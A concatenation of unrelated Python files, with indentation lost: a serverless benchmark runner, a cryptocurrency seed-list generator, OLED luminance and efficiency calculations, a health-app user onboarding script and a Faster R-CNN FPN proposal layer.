data = BeautifulReport.img2base(img_path, pargs[0] + '.png')
print(HTML_IMG_TEMPLATE.format(data, data))
sys.exit(0)
print('<br></br>')
if len(pargs) > 1:
for parg in pargs:
print(parg + ':')
data = BeautifulReport.img2base(img_path, parg + '.png')
print(HTML_IMG_TEMPLATE.format(data, data))
return result
if not os.path.exists(img_path + pargs[0] + '.png'):
return result
data = BeautifulReport.img2base(img_path, pargs[0] + '.png')
print(HTML_IMG_TEMPLATE.format(data, data))
return result
return __wrap
return _wrap
|
the-stack_106_23305 | import os
import threading
import time
import sys, getopt
def client(i,results,loopTimes):
print("client %d start" %i)
command = "./single-cold_warm.sh -R -t " + str(loopTimes)
r = os.popen(command)
text = r.read()
results[i] = text
print("client %d finished" %i)
def warmup(i,warmupTimes,actionName,params):
for j in range(warmupTimes):
r = os.popen("wsk -i action invoke %s %s --result --blocking" %(actionName,params))
text = r.read()
print("client %d warmup finished" %i)
def main():
argv = getargv()
clientNum = argv[0]
loopTimes = argv[1]
warmupTimes = argv[2]
threads = []
containerName = "hellonodejs"
actionName = "hello-nodejs"
params = ""
r = os.popen("docker stop `docker ps | grep %s | awk {'print $1'}`" %containerName)
r.read()
# First: warm up
for i in range(clientNum):
t = threading.Thread(target=warmup,args=(i,warmupTimes,actionName,params))
threads.append(t)
for i in range(clientNum):
threads[i].start()
for i in range(clientNum):
threads[i].join()
print("Warm up complete")
# Second: invoke the actions
# Initialize the results and the clients
threads = []
results = []
for i in range(clientNum):
results.append('')
# Create the clients
for i in range(clientNum):
t = threading.Thread(target=client,args=(i,results,loopTimes))
threads.append(t)
# start the clients
for i in range(clientNum):
threads[i].start()
for i in range(clientNum):
threads[i].join()
outfile = open("result.csv","w")
outfile.write("invokeTime,startTime,endTime\n")
latencies = []
minInvokeTime = 0x7fffffffffffffff
maxEndTime = 0
for i in range(clientNum):
# get and parse the result of a client
clientResult = parseResult(results[i])
# print the result of every loop of the client
for j in range(len(clientResult)):
outfile.write(clientResult[j][0] + ',' + clientResult[j][1] + \
',' + clientResult[j][2] + '\n')
# Collect the latency
latency = int(clientResult[j][-1]) - int(clientResult[j][0])
latencies.append(latency)
# Find the first invoked action and the last return one.
if int(clientResult[j][0]) < minInvokeTime:
minInvokeTime = int(clientResult[j][0])
if int(clientResult[j][-1]) > maxEndTime:
maxEndTime = int(clientResult[j][-1])
formatResult(latencies,maxEndTime - minInvokeTime, clientNum, loopTimes, warmupTimes)
def parseResult(result):
lines = result.split('\n')
parsedResults = []
for line in lines:
if line.find("invokeTime") == -1:
continue
parsedTimes = ['','','']
i = 0
count = 0
while count < 3:
while i < len(line):
if line[i].isdigit():
parsedTimes[count] = line[i:i+13]
i += 13
count += 1
continue
i += 1
parsedResults.append(parsedTimes)
return parsedResults
def getargv():
if len(sys.argv) != 3 and len(sys.argv) != 4:
print("Usage: python3 run.py <client number> <loop times> [<warm up times>]")
exit(0)
if not str.isdigit(sys.argv[1]) or not str.isdigit(sys.argv[2]) or int(sys.argv[1]) < 1 or int(sys.argv[2]) < 1:
print("Usage: python3 run.py <client number> <loop times> [<warm up times>]")
print("Client number and loop times must be an positive integer")
exit(0)
if len(sys.argv) == 4:
if not str.isdigit(sys.argv[3]) or int(sys.argv[3]) < 1:
print("Usage: python3 run.py <client number> <loop times> [<warm up times>]")
print("Warm up times must be an positive integer")
exit(0)
else:
return (int(sys.argv[1]),int(sys.argv[2]),1)
return (int(sys.argv[1]),int(sys.argv[2]),int(sys.argv[3]))
def formatResult(latencies,duration,client,loop,warmup):
requestNum = len(latencies)
latencies.sort()
duration = float(duration)
# calculate the average latency
total = 0
for latency in latencies:
total += latency
print("\n")
print("------------------ result ---------------------")
averageLatency = float(total) / requestNum
_50pcLatency = latencies[int(requestNum * 0.5) - 1]
_75pcLatency = latencies[int(requestNum * 0.75) - 1]
_90pcLatency = latencies[int(requestNum * 0.9) - 1]
_95pcLatency = latencies[int(requestNum * 0.95) - 1]
_99pcLatency = latencies[int(requestNum * 0.99) - 1]
print("latency (ms):\navg\t50%\t75%\t90%\t95%\t99%")
print("%.2f\t%d\t%d\t%d\t%d\t%d" %(averageLatency,_50pcLatency,_75pcLatency,_90pcLatency,_95pcLatency,_99pcLatency))
print("throughput (n/s):\n%.2f" %(requestNum / (duration/1000)))
# output result to file
resultfile = open("eval-result.log","a")
resultfile.write("\n\n------------------ (concurrent)result ---------------------\n")
resultfile.write("client: %d, loop_times: %d, warup_times: %d\n" % (client, loop, warmup))
resultfile.write("%d requests finished in %.2f seconds\n" %(requestNum, (duration/1000)))
resultfile.write("latency (ms):\navg\t50%\t75%\t90%\t95%\t99%\n")
resultfile.write("%.2f\t%d\t%d\t%d\t%d\t%d\n" %(averageLatency,_50pcLatency,_75pcLatency,_90pcLatency,_95pcLatency,_99pcLatency))
resultfile.write("throughput (n/s):\n%.2f\n" %(requestNum / (duration/1000)))
main() |
the-stack_106_23307 | #!/usr/bin/env python3
# Copyright (c) 2013-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Generate seeds.txt from Pieter's DNS seeder
#
NSEEDS=512
MAX_SEEDS_PER_ASN=2
MIN_BLOCKS = 615801
# These are hosts that have been observed to be behaving strangely (e.g.
# aggressively connecting to every node).
SUSPICIOUS_HOSTS = {
""
}
import re
import sys
import dns.resolver
import collections
PATTERN_IPV4 = re.compile(r"^((\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})):(\d+)$")
PATTERN_IPV6 = re.compile(r"^\[([0-9a-z:]+)\]:(\d+)$")
PATTERN_ONION = re.compile(r"^([abcdefghijklmnopqrstuvwxyz234567]{16}\.onion):(\d+)$")
PATTERN_AGENT = re.compile(r"^(/GastroCoinCoin:2.2.(0|1|99)/)$")
def parseline(line):
sline = line.split()
if len(sline) < 11:
return None
m = PATTERN_IPV4.match(sline[0])
sortkey = None
ip = None
if m is None:
m = PATTERN_IPV6.match(sline[0])
if m is None:
m = PATTERN_ONION.match(sline[0])
if m is None:
return None
else:
net = 'onion'
ipstr = sortkey = m.group(1)
port = int(m.group(2))
else:
net = 'ipv6'
if m.group(1) in ['::']: # Not interested in localhost
return None
ipstr = m.group(1)
sortkey = ipstr # XXX parse IPv6 into number, could use name_to_ipv6 from generate-seeds
port = int(m.group(2))
else:
# Do IPv4 sanity check
ip = 0
for i in range(0,4):
if int(m.group(i+2)) < 0 or int(m.group(i+2)) > 255:
return None
ip = ip + (int(m.group(i+2)) << (8*(3-i)))
if ip == 0:
return None
net = 'ipv4'
sortkey = ip
ipstr = m.group(1)
port = int(m.group(6))
# Skip bad results.
if sline[1] == 0:
return None
# Extract uptime %.
uptime30 = float(sline[7][:-1])
# Extract Unix timestamp of last success.
lastsuccess = int(sline[2])
# Extract protocol version.
version = int(sline[10])
# Extract user agent.
if len(sline) > 11:
agent = sline[11][1:] + sline[12][:-1]
else:
agent = sline[11][1:-1]
# Extract service flags.
service = int(sline[9], 16)
# Extract blocks.
blocks = int(sline[8])
# Construct result.
return {
'net': net,
'ip': ipstr,
'port': port,
'ipnum': ip,
'uptime': uptime30,
'lastsuccess': lastsuccess,
'version': version,
'agent': agent,
'service': service,
'blocks': blocks,
'sortkey': sortkey,
}
def filtermultiport(ips):
'''Filter out hosts with more nodes per IP'''
hist = collections.defaultdict(list)
for ip in ips:
hist[ip['sortkey']].append(ip)
return [value[0] for (key,value) in list(hist.items()) if len(value)==1]
# Based on Greg Maxwell's seed_filter.py
def filterbyasn(ips, max_per_asn, max_total):
# Sift out ips by type
ips_ipv4 = [ip for ip in ips if ip['net'] == 'ipv4']
ips_ipv6 = [ip for ip in ips if ip['net'] == 'ipv6']
ips_onion = [ip for ip in ips if ip['net'] == 'onion']
# Filter IPv4 by ASN
result = []
asn_count = {}
for ip in ips_ipv4:
if len(result) == max_total:
break
try:
asn = int([x.to_text() for x in dns.resolver.query('.'.join(reversed(ip['ip'].split('.'))) + '.origin.asn.cymru.com', 'TXT').response.answer][0].split('\"')[1].split(' ')[0])
if asn not in asn_count:
asn_count[asn] = 0
if asn_count[asn] == max_per_asn:
continue
asn_count[asn] += 1
result.append(ip)
except:
sys.stderr.write('ERR: Could not resolve ASN for "' + ip['ip'] + '"\n')
# TODO: filter IPv6 by ASN
# Add back non-IPv4
result.extend(ips_ipv6)
result.extend(ips_onion)
return result
def main():
lines = sys.stdin.readlines()
ips = [parseline(line) for line in lines]
# Skip entries with valid address.
ips = [ip for ip in ips if ip is not None]
# Skip entries from suspicious hosts.
ips = [ip for ip in ips if ip['ip'] not in SUSPICIOUS_HOSTS]
# Enforce minimal number of blocks.
ips = [ip for ip in ips if ip['blocks'] >= MIN_BLOCKS]
# Require service bit 1.
ips = [ip for ip in ips if (ip['service'] & 1) == 1]
# Require at least 50% 30-day uptime.
ips = [ip for ip in ips if ip['uptime'] > 50]
# Require a known and recent user agent.
ips = [ip for ip in ips if PATTERN_AGENT.match(re.sub(' ', '-', ip['agent']))]
# Sort by availability (and use last success as tie breaker)
ips.sort(key=lambda x: (x['uptime'], x['lastsuccess'], x['ip']), reverse=True)
# Filter out hosts with multiple bitcoin ports, these are likely abusive
ips = filtermultiport(ips)
# Look up ASNs and limit results, both per ASN and globally.
ips = filterbyasn(ips, MAX_SEEDS_PER_ASN, NSEEDS)
# Sort the results by IP address (for deterministic output).
ips.sort(key=lambda x: (x['net'], x['sortkey']))
for ip in ips:
if ip['net'] == 'ipv6':
print('[%s]:%i' % (ip['ip'], ip['port']))
else:
print('%s:%i' % (ip['ip'], ip['port']))
if __name__ == '__main__':
main()
|
the-stack_106_23309 | # coding: utf-8
# General Modules
# import os, shutil
# import re, string
import os
import re
import math
import numpy as np
import pandas as pd
import datetime as dt
import copy
import scipy.constants as sc # natural constants
def read_calibration_files(
photopic_response_path,
pd_responsivity_path,
cie_reference_path,
spectrometer_calibration_path,
):
"""
Function that wraps reading in the calibration files and returns them as dataframes
"""
photopic_response = pd.read_csv(
# os.path.join(
# os.path.dirname(os.path.dirname(__file__)),
# "library",
# "Photopic_response.txt",
# ),
photopic_response_path,
sep="\t",
names=["wavelength", "photopic_response"],
)
pd_responsivity = pd.read_csv(
# os.path.join(
# os.path.dirname(os.path.dirname(__file__)), "library", "Responsivity_PD.txt"
# ),
pd_responsivity_path,
sep="\t",
names=["wavelength", "pd_responsivity"],
)
cie_reference = pd.read_csv(
# os.path.join(
# os.path.dirname(os.path.dirname(__file__)),
# "library",
# "NormCurves_400-800.txt",
# ),
cie_reference_path,
sep="\t",
names=["wavelength", "none", "x_cie", "y_cie", "z_cie"],
)
spectrometer_calibration = pd.read_csv(
# os.path.join(
# os.path.dirname(os.path.dirname(__file__)), "library", "CalibrationData.txt"
# ),
spectrometer_calibration_path,
sep="\t",
names=["wavelength", "sensitivity"],
)
# Only take the part of the calibration files that is in the range of the
# spectrometer calibration file. Otherwise all future interpolations will
# interpolate on data that does not exist. I think it doesn't make a
# difference because this kind of data is set to zero anyways by the
# interpolate function but it is more logic to get rid of the unwanted data
# here already
photopic_response_range = photopic_response.loc[
np.logical_and(
photopic_response["wavelength"]
<= spectrometer_calibration["wavelength"].max(),
photopic_response["wavelength"]
>= spectrometer_calibration["wavelength"].min(),
)
]
pd_responsivity_range = pd_responsivity.loc[
np.logical_and(
pd_responsivity["wavelength"]
<= spectrometer_calibration["wavelength"].max(),
pd_responsivity["wavelength"]
>= spectrometer_calibration["wavelength"].min(),
)
]
cie_reference_range = cie_reference.loc[
np.logical_and(
cie_reference["wavelength"] <= spectrometer_calibration["wavelength"].max(),
cie_reference["wavelength"] >= spectrometer_calibration["wavelength"].min(),
)
]
return (
photopic_response_range,
pd_responsivity_range,
cie_reference_range,
spectrometer_calibration,
)
def interpolate_spectrum(spectrum, photopic_response):
"""
Function that does the interpolation of a given pandas dataframe on the
photopic response calibration wavelengths. This is later needed for the
integrals.
"""
def interpolate(column):
"""
Helper function to do the numpy interpolate on an entire dataframe
"""
return np.interp(
photopic_response["wavelength"].to_numpy(),
spectrum["wavelength"].to_numpy(),
column,
)
# Now interpolate the entire dataframe on the wavelengths that are present in
# the photopic_response file
spectrum_interpolated_df = spectrum.apply(interpolate)
return spectrum_interpolated_df
def calibrate_spectrum(spectrum, calibration):
"""
Function that takes a pandas dataframe spectrum and corrects it according to
the calibration files
"""
# interpolate spectrometer calibration factor onto correct axis (so that it
# can be multiplied with the spectrum itself)
interpolated_calibration = np.interp(
spectrum["wavelength"].to_numpy(dtype=np.float),
calibration["wavelength"].to_numpy(dtype=np.float),
calibration["sensitivity"].to_numpy(dtype=np.float),
)
# Now subtract background and multiply with calibration
spectrum_corrected = (
spectrum.loc[:, ~np.isin(spectrum.columns, ["background", "wavelength"])]
.subtract(spectrum["background"], axis=0)
.multiply(interpolated_calibration, axis=0)
)
spectrum_corrected["wavelength"] = spectrum["wavelength"]
return spectrum_corrected
# Now interpolate and correct the spectrum
# spectrum_corrected = interpolate_and_correct_spectrum(spectrum)
#######################################################################################
######################## Only Angle Resolved Spectrum Related #########################
#######################################################################################
def calculate_ri(column):
"""
Function that calculates radiant intensity
"""
return float(sc.h * sc.c / 1e-9 * np.sum(column))
def calculate_li(column, photopic_response):
"""
Function that calculates the luminous intensity
Emission in terms of photometric response, so taking into account the
spectral shifts and sensitivity of the eye/photopic response
"""
return float(
sc.physical_constants["luminous efficacy"][0]
* sc.h
* sc.c
/ 1e-9
* np.sum(column * photopic_response["photopic_response"].to_numpy())
)
# ri = spectrum_corrected.drop(["0_deg", "wavelength"], axis=1).apply(
# calculate_ri, axis=0
# )
# li = spectrum_corrected.drop(["0_deg", "wavelength"], axis=1).apply(
# calculate_li, axis=0
# )
def calculate_e_correction(df):
"""
Closure to calculate the e correction factor from a dataframe
"""
# Get angles from column names first
try:
angles = df.drop(["0_deg", "wavelength"], axis=1).columns.to_numpy(float)
except:
angles = df.drop(["wavelength"], axis=1).columns.to_numpy(float)
def calculate_efactor(column):
"""
Function to calculate efactor, perp_intensity is just the intensity at 0°
"""
return sum(column * df["wavelength"]) / sum(df["0.0"] * df["wavelength"])
try:
e_factor = df.drop(["0_deg", "wavelength"], axis=1).apply(calculate_efactor)
except:
e_factor = df.drop(["wavelength"], axis=1).apply(calculate_efactor)
# It is now important to only integrate from 0 to 90° and not the entire spectrum
# It is probably smarter to pull this at some point up but this works.
relevant_e_factors = e_factor.loc[
np.logical_and(
np.array(e_factor.index).astype(float) >= 0,
np.array(e_factor.index).astype(float) <= 90,
)
]
relevant_angles = np.array(
e_factor.loc[
np.logical_and(
np.array(e_factor.index).astype(float) >= 0,
np.array(e_factor.index).astype(float) <= 90,
)
].index
).astype(float)
return np.sum(
relevant_e_factors
* np.sin(np.deg2rad(relevant_angles))
* np.deg2rad(np.diff(relevant_angles)[0])
)
def calculate_v_correction(df, photopic_response):
"""
Closure to calculate the e correction factor from a dataframe
"""
# Get angles from column names first
try:
angles = df.drop(["0_deg", "wavelength"], axis=1).columns.to_numpy(float)
except:
angles = df.drop(["wavelength"], axis=1).columns.to_numpy(float)
def calculate_vfactor(column):
"""
Function to calculate the vfactor
"""
return sum(column * photopic_response["photopic_response"].to_numpy()) / sum(
df["0.0"] * photopic_response["photopic_response"].to_numpy()
)
try:
v_factor = df.drop(["0_deg", "wavelength"], axis=1).apply(calculate_vfactor)
except:
v_factor = df.drop(["wavelength"], axis=1).apply(calculate_vfactor)
# It is now important to only integrate from 0 to 90° and not the entire spectrum
# It is probably smarter to pull this at some point up but this works.
relevant_v_factor = v_factor.loc[
np.logical_and(
np.array(v_factor.index).astype(float) >= 0,
np.array(v_factor.index).astype(float) <= 90,
)
]
relevant_angles = np.array(
v_factor.loc[
np.logical_and(
np.array(v_factor.index).astype(float) >= 0,
np.array(v_factor.index).astype(float) <= 90,
)
].index
).astype(float)
return np.sum(
relevant_v_factor
* np.sin(np.deg2rad(relevant_angles))
* np.deg2rad(np.diff(relevant_angles)[0])
)
class JVLData:
"""
At this point I think it is easier to have a class that allows for easy
calculation of the characteristics
"""
def __init__(
self,
jvl_data,
perpendicular_spectrum,
photopic_response,
pd_responsivity,
cie_reference,
angle_resolved,
pixel_area,
pd_resistance,
pd_radius,
pd_distance,
pd_cutoff,
correction_factor=[],
):
"""
All data must be provided in SI units!
The calculated quantities are, however, directly in their final
(usual) units.
- voltage: volts
- current: mA
- current density: mA/cm2
- absolute current density: mA/cm2
- luminance: cd/m2
- eqe: %
- luminous_efficacy: lm/W
- current_efficiency: cd/A
- power density: mW/mm2
"""
self.pd_resistance = pd_resistance
self.pixel_area = pixel_area
# Taking into account finite size of PD
self.sqsinalpha = pd_radius ** 2 / (pd_distance ** 2 + pd_radius ** 2)
self.voltage = np.array(jvl_data["voltage"])
self.pd_voltage = np.array(jvl_data["pd_voltage"])
# All pd voltages that are below cutoff are now cut off and set to zero.
# This is done using a helper array to preserve the original data
self.pd_voltage_cutoff = copy.copy(self.pd_voltage)
self.pd_voltage_cutoff[self.pd_voltage_cutoff <= pd_cutoff] = 0
self.current = np.array(jvl_data["current"]) / 1000
# Current density directly in mA/cm^2
self.current_density = np.array(jvl_data["current"]) / (pixel_area * 1e4)
self.absolute_current_density = np.array(abs(self.current_density))
self.cie_coordinates = self.calculate_cie_coordinates(
perpendicular_spectrum,
cie_reference,
)
self.calculate_integrals(
perpendicular_spectrum,
photopic_response["photopic_response"],
pd_responsivity["pd_responsivity"],
)
if angle_resolved == True:
# Non lambertian case
e_coeff = self.calculate_non_lambertian_e_coeff()
v_coeff = self.calculate_non_lambertian_v_coeff()
self.eqe = self.calculate_non_lambertian_eqe(e_coeff, correction_factor[0])
self.luminance = self.calculate_non_lambertian_luminance(v_coeff)
self.luminous_efficacy = self.calculate_non_lambertian_luminous_efficacy(
v_coeff, correction_factor[1]
)
self.power_density = self.calculate_non_lambertian_power_density(
e_coeff, correction_factor[0]
)
else:
# Lambertian case
e_coeff = self.calculate_lambertian_e_coeff()
v_coeff = self.calculate_lambertian_v_coeff()
self.eqe = self.calculate_lambertian_eqe(e_coeff)
self.luminance = self.calculate_lambertian_luminance(v_coeff)
self.luminous_efficacy = self.calculate_lambertian_luminous_efficacy(
v_coeff
)
self.power_density = self.calculate_lambertian_power_density(e_coeff)
self.current_efficiency = self.calculate_current_efficiency()
def calculate_integrals(
self, perpendicular_spectrum, photopic_response, pd_responsivity
):
"""
Function that calculates the important integrals
"""
self.integral_1 = np.sum(
perpendicular_spectrum["intensity"] * perpendicular_spectrum["wavelength"]
)
# Integral2 = np.sum(perp_intensity)
self.integral_2 = np.sum(perpendicular_spectrum["intensity"])
# Integral3 = np.sum(perp_intensity * photopic_response["photopic_response"].to_numpy())
self.integral_3 = np.sum(
perpendicular_spectrum["intensity"].to_numpy()
* photopic_response.to_numpy()
)
# Integral4 = np.sum(perp_intensity * pd_responsivity["pd_responsivity"].to_numpy())
self.integral_4 = np.sum(
perpendicular_spectrum["intensity"] * pd_responsivity.to_numpy()
)
# Calculating CIE coordinates
def calculate_cie_coordinates(self, perpendicular_spectrum, cie_reference):
"""
Calculates wavelength of maximum spectral intensity and the CIE color coordinates
"""
# max_intensity_wavelength = perpendicular_spectrum.loc[
# perpendicular_spectrum.intensity == perpendicular_spectrum.intensity.max(),
# "wavelength",
# ].to_list()[0]
X = sum(perpendicular_spectrum.intensity * cie_reference.x_cie)
Y = sum(perpendicular_spectrum.intensity * cie_reference.y_cie)
Z = sum(perpendicular_spectrum.intensity * cie_reference.z_cie)
CIE = np.array([X / (X + Y + Z), Y / (X + Y + Z)])
return CIE
def calculate_non_lambertian_e_coeff(self):
"""
Calculate e_coeff
"""
return self.pd_voltage_cutoff / self.pd_resistance / self.sqsinalpha * 2
def calculate_non_lambertian_v_coeff(self):
"""
Calculate v_coeff
"""
return (
sc.physical_constants["luminous efficacy"][0]
* self.pd_voltage_cutoff
/ self.pd_resistance
/ self.sqsinalpha
* 2
)
def calculate_non_lambertian_eqe(self, e_coeff, e_correction_factor):
"""
Function to calculate the eqe
"""
# e_coeff = self.calculate_non_lambertian_e_coeff(jvl_data)
return np.divide(
100 * sc.e * e_coeff * self.integral_1 * e_correction_factor,
1e9 * sc.h * sc.c * self.current * self.integral_4,
out=np.zeros_like(
100 * sc.e * e_coeff * self.integral_1 * e_correction_factor
),
where=1e9 * sc.h * sc.c * self.current * self.integral_4 != 0,
)
# eqe = 100 * (
# sc.e
# / 1e9
# / sc.h
# / sc.c
# / self.current
# * e_coeff
# * self.integral_1
# / self.integral_4
# * e_correction_factor
# )
# return eqe
def calculate_non_lambertian_luminance(self, v_coeff):
"""
Calculate luminance
"""
# v_coeff = self.calculate_non_lambertian_v_coeff(jvl_data)
return (
1
/ np.pi
/ self.pixel_area
* v_coeff
/ 2
* self.integral_3
/ self.integral_4
)
def calculate_non_lambertian_luminous_efficacy(self, v_coeff, v_correction_factor):
"""
Calculate luminous efficiency
"""
# v_coeff = self.calculate_non_lambertian_v_coeff(jvl_data)
return np.divide(
v_coeff * self.integral_3 * v_correction_factor,
self.voltage * self.current * self.integral_4,
out=np.zeros_like(v_coeff * self.integral_3 * v_correction_factor),
where=self.voltage * self.current * self.integral_4 != 0,
)
def calculate_current_efficiency(self):
"""
Calculate current efficiency
"""
# In case of the current being zero, set a helper current to nan so
# that the result of the division becomes nan instead of infinite
return np.divide(
self.pixel_area * self.luminance,
self.current,
out=np.zeros_like(self.pixel_area * self.luminance),
where=self.current != 0,
)
# b = self.pixel_area / self.current * self.luminance
def calculate_non_lambertian_power_density(self, e_coeff, e_correction_factor):
"""
Calculate power density
"""
# e_coeff = self.calculate_non_lambertian_e_coeff(jvl_data)
return (
1
/ (self.pixel_area * 1e6)
* e_coeff
* self.integral_2
/ self.integral_4
* e_correction_factor
* 1e3
)
def calculate_lambertian_e_coeff(self):
"""
Calculate e_coeff
"""
return self.pd_voltage_cutoff / self.pd_resistance / self.sqsinalpha
def calculate_lambertian_v_coeff(self):
"""
Calculate v_coeff
"""
return (
sc.physical_constants["luminous efficacy"][0]
* self.pd_voltage_cutoff
/ self.pd_resistance
/ self.sqsinalpha
)
def calculate_lambertian_eqe(self, e_coeff):
"""
Function to calculate the eqe
"""
# e_coeff = calculate_lambertian_eqe(jvl_data)
return np.divide(
100 * sc.e * e_coeff * self.integral_1,
1e9 * sc.h * sc.c * self.current * self.integral_4,
out=np.zeros_like(100 * sc.e * e_coeff * self.integral_1),
where=1e9 * sc.h * sc.c * self.current * self.integral_4 != 0,
)
# return 100 * (
# sc.e
# / 1e9
# / sc.h
# / sc.c
# / self.current
# * e_coeff
# * self.integral_1
# / self.integral_4
# )
def calculate_lambertian_luminance(self, v_coeff):
"""
Calculate luminance
"""
# v_coeff = calculate_lambertian_v_coeff(jvl_data)
return np.divide(
1 * v_coeff * self.integral_3,
np.pi * self.pixel_area * self.integral_4,
out=np.zeros_like(1 * v_coeff * self.integral_3),
where=np.pi * self.pixel_area * self.integral_4 != 0,
)
# return 1 / np.pi / self.pixel_area * v_coeff * self.integral_3 / self.integral_4
def calculate_lambertian_luminous_efficacy(self, v_coeff):
"""
Calculate luminous efficiency
"""
# v_coeff = calculate_lambertian_v_coeff(self, jvl_data)
return np.divide(
1 * v_coeff * self.integral_3,
self.voltage * self.current * self.integral_4,
out=np.zeros_like(1 * v_coeff * self.integral_3),
where=self.voltage * self.current * self.integral_4 != 0,
)
# return (
# 1 / self.voltage / self.current * v_coeff * self.integral_3 / self.integral_4
# )
def calculate_lambertian_power_density(self, e_coeff):
"""
Calculate power density
"""
# e_coeff = calculate_lambertian_e_coeff(jvl_data)
return (
1
/ (self.pixel_area * 1e6)
* e_coeff
* self.integral_2
/ self.integral_4
* 1e3
)
def to_series(self):
"""
return the variables of the class as dataframe
"""
df = pd.Series()
df["voltage"] = self.voltage
df["pd_voltage"] = self.pd_voltage
df["current"] = self.current
df["current_density"] = self.current_density
df["absolute_current_density"] = self.absolute_current_density
df["cie"] = self.cie_coordinates
df["luminance"] = self.luminance
df["eqe"] = self.eqe
df["luminous_efficacy"] = self.luminous_efficacy
df["current_efficiency"] = self.current_efficiency
df["power_density"] = self.power_density
return df
|
the-stack_106_23310 | import argparse
import sys
from virtual_coach_db.dbschema.models import Users
from virtual_coach_db.helper.helper import get_db_session
from niceday_client import NicedayClient, TrackerStatus
from niceday_client.definitions import Tracker
def enable_custom_trackers(userid: int):
"""
Enable custom trackers for user. We enable:
- 'tracker_smoking', trackerId=Tracker.SMOKING
See https://github.com/senseobservationsystems/goalie-js/issues/840 on how to get a
trackerId for a certain custom tracker.
Args:
userid: ID of the user you want to set tracker status for
"""
print('Enabling custom trackers')
client = NicedayClient()
client.set_user_tracker_statuses(
userid,
[TrackerStatus(trackerId=Tracker.SMOKING, isEnabled=True)])
def onboard_user(userid):
client = NicedayClient()
enable_custom_trackers(userid)
print(f'Fetching niceday profile for user {userid}')
profile = client.get_profile(userid)
print('Profile:', profile)
# Open session with db
session = get_db_session()
# Check if this user already exists in the table
# (assumes niceday user id is unique and immutable)
existing_users = (session.query(Users).
filter(Users.nicedayuid == userid).
count())
if existing_users != 0:
sys.exit(f'User {userid} already exists in the database.')
# Add new user to the Users table
new_user = Users(
nicedayuid=userid,
firstname=profile['firstName'],
lastname=profile['lastName'],
location=profile['location'],
gender=profile['gender'],
dob=profile['birthDate']
)
session.add(new_user)
session.commit()
print(f'Added new user profile (niceday uid {userid}) to db')
def main():
parser = argparse.ArgumentParser(description="Onboard the user with the given ID")
parser.add_argument("userid", type=int, help="User ID on Sensehealth server")
args = parser.parse_args()
onboard_user(args.userid)
if __name__ == "__main__":
main()
|
the-stack_106_23311 | # --------------------------------------------------------
# Faster R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick and Sean Bell
# --------------------------------------------------------
# --------------------------------------------------------
# Reorganized and modified by Jianwei Yang and Jiasen Lu
# --------------------------------------------------------
import torch
import torch.nn as nn
import numpy as np
import math
import yaml
from model.utils.config import cfg
from .generate_anchors import generate_anchors, generate_anchors_all_pyramids
from .bbox_transform import bbox_transform_inv, clip_boxes, clip_boxes_batch
#from model.nms.nms_wrapper import nms
from model.roi_layers import nms
import pdb
DEBUG = False
class _ProposalLayer_FPN(nn.Module):
"""
Outputs object detection proposals by applying estimated bounding-box
transformations to a set of regular boxes (called "anchors").
"""
def __init__(self, feat_stride, scales, ratios):
super(_ProposalLayer_FPN, self).__init__()
self._anchor_ratios = ratios
self._feat_stride = feat_stride
self._fpn_scales = np.array(cfg.FPN_ANCHOR_SCALES)
self._fpn_feature_strides = np.array(cfg.FPN_FEAT_STRIDES)
self._fpn_anchor_stride = cfg.FPN_ANCHOR_STRIDE
# self._anchors = torch.from_numpy(generate_anchors_all_pyramids(self._fpn_scales, ratios, self._fpn_feature_strides, fpn_anchor_stride))
# self._num_anchors = self._anchors.size(0)
def forward(self, input):
# Algorithm:
#
# for each (H, W) location i
# generate A anchor boxes centered on cell i
# apply predicted bbox deltas at cell i to each of the A anchors
# clip predicted boxes to image
# remove predicted boxes with either height or width < threshold
# sort all (proposal, score) pairs by score from highest to lowest
# take top pre_nms_topN proposals before NMS
# apply NMS with threshold 0.7 to remaining proposals
# take after_nms_topN proposals after NMS
# return the top proposals (-> RoIs top, scores top)
# the first set of _num_anchors channels are bg probs
# the second set are the fg probs
scores = input[0][:, :, 1] # batch_size x num_rois x 1
bbox_deltas = input[1] # batch_size x num_rois x 4
im_info = input[2]
cfg_key = input[3]
feat_shapes = input[4]
pre_nms_topN = cfg[cfg_key].RPN_PRE_NMS_TOP_N
post_nms_topN = cfg[cfg_key].RPN_POST_NMS_TOP_N
nms_thresh = cfg[cfg_key].RPN_NMS_THRESH
min_size = cfg[cfg_key].RPN_MIN_SIZE
batch_size = bbox_deltas.size(0)
anchors = torch.from_numpy(generate_anchors_all_pyramids(self._fpn_scales, self._anchor_ratios,
feat_shapes, self._fpn_feature_strides, self._fpn_anchor_stride)).type_as(scores)
num_anchors = anchors.size(0)
anchors = anchors.view(1, num_anchors, 4).expand(batch_size, num_anchors, 4)
# Convert anchors into proposals via bbox transformations
proposals = bbox_transform_inv(anchors, bbox_deltas, batch_size)
# 2. clip predicted boxes to image
proposals = clip_boxes(proposals, im_info, batch_size)
# keep_idx = self._filter_boxes(proposals, min_size).squeeze().long().nonzero().squeeze()
scores_keep = scores
proposals_keep = proposals
_, order = torch.sort(scores_keep, 1, True)
output = scores.new(batch_size, post_nms_topN, 5).zero_()
for i in range(batch_size):
# # 3. remove predicted boxes with either height or width < threshold
# # (NOTE: convert min_size to input image scale stored in im_info[2])
proposals_single = proposals_keep[i]
scores_single = scores_keep[i]
# # 4. sort all (proposal, score) pairs by score from highest to lowest
# # 5. take top pre_nms_topN (e.g. 6000)
order_single = order[i]
if pre_nms_topN > 0 and pre_nms_topN < scores_keep.numel():
order_single = order_single[:pre_nms_topN]
proposals_single = proposals_single[order_single, :]
scores_single = scores_single[order_single].view(-1,1)
# 6. apply nms (e.g. threshold = 0.7)
# 7. take after_nms_topN (e.g. 300)
# 8. return the top proposals (-> RoIs top)
#keep_idx_i = nms(torch.cat((proposals_single, scores_single), 1), nms_thresh)
keep_idx_i = nms(proposals_single, scores_single.squeeze(1), nms_thresh)
keep_idx_i = keep_idx_i.long().view(-1)
if post_nms_topN > 0:
keep_idx_i = keep_idx_i[:post_nms_topN]
proposals_single = proposals_single[keep_idx_i, :]
scores_single = scores_single[keep_idx_i, :]
# padding 0 at the end.
num_proposal = proposals_single.size(0)
output[i,:,0] = i
output[i,:num_proposal,1:] = proposals_single
return output
def backward(self, top, propagate_down, bottom):
"""This layer does not propagate gradients."""
pass
def reshape(self, bottom, top):
"""Reshaping happens during the call to forward."""
pass
